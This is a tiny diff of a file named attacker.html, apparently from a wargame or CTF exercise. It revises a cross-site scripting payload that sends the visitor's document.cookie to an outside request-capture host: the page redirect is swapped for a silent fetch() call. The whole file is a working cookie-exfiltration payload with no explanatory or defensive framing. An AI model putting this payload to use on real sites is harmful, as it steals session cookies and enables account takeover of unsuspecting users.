--- a/attacker.html
+++ b/attacker.html
@@ -1,3 +1,3 @@
 <script>
-  location.href="https://rhosfmk.request.dreamhack.games/?haha="+document.cookie
+  fetch("https://rhosfmk.request.dreamhack.games/?haha="+document.cookie);
 </script>
